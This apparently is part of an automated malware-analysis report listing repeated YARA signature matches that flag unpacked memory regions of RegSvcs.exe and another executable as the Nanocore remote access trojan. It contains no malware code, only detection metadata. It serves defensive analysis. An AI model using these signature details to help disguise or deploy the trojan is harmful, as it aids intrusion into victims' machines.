      Source: 9.2.RegSvcs.exe.269d93c.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.269d93c.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.5f0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.5f0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.37263cf.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.37263cf.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.39a632e.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.39a632e.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.4600000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.4600000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.37263cf.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.37263cf.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.399d4ff.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.399d4ff.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.b70000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.b70000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3a1bc6e.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3a1bc6e.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3a2a09e.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3a2a09e.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.5a0000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.5a0000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3840482.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3840482.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.382be55.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.382be55.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.d80000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.d80000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.48f4c9f.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.48f4c9f.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.381fc21.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.381fc21.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.2689300.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.2689300.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.4850000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.4850000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3a1bc6e.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3a1bc6e.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.399d4ff.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.399d4ff.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.399d4ff.25.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.3a12e3f.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3a12e3f.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.267d0b8.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.267d0b8.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.48f0000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.48f0000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.36547bd.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.36547bd.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.3650194.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3650194.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
